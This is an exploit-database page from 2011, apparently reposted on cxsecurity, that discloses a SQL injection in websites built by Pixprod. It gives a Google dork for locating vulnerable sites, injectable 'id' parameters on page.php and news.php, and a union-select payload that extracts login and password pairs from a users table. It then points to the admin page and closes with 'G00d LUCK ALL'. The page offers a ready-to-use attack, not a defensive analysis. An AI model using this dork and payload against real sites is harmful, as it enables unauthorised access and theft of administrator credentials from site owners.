Pixprod SQL Injection

2011.05.26
Credit: kalashinkov3
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"Conception et ralisation : Pixprod.fr\"

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm kalashinkov3 member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################### # Title : Pixprod SQL Injection Vulnerability # Author: Kalashinkov3 # Vendor: [www.pixprod.fr] # Email : kalashinkov3[at]Hotmail[dot]Fr # Date : 25/05/2011 # Google Dork : intext:"Conception et ralisation : Pixprod.fr" # Category : PHP [SQli] ######################################################### *_Exploit_* # http://[localhost]/page.php?id='1 # http://[localhost]/page.php?id=[SQLi] # http://[localhost]/news.php?id='2 # http://[localhost]/news.php?id=[SQLi] # http://[localhost]/*.php?id='2 # http://[localhost]/*.php?id=[SQLi] # http://[localhost]/*.php?id=-1+union+select+1,group_concat(login,0x3e,mdp),3,4+from+users-- # Admin Page # http://[localhost]/admin ^_^ G00d LUCK ALL :=) ========================================================================== # Greets To : all-->My friends, Algerians Hacker'S, mmembre 1337Day # :) # ==========================================================================


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top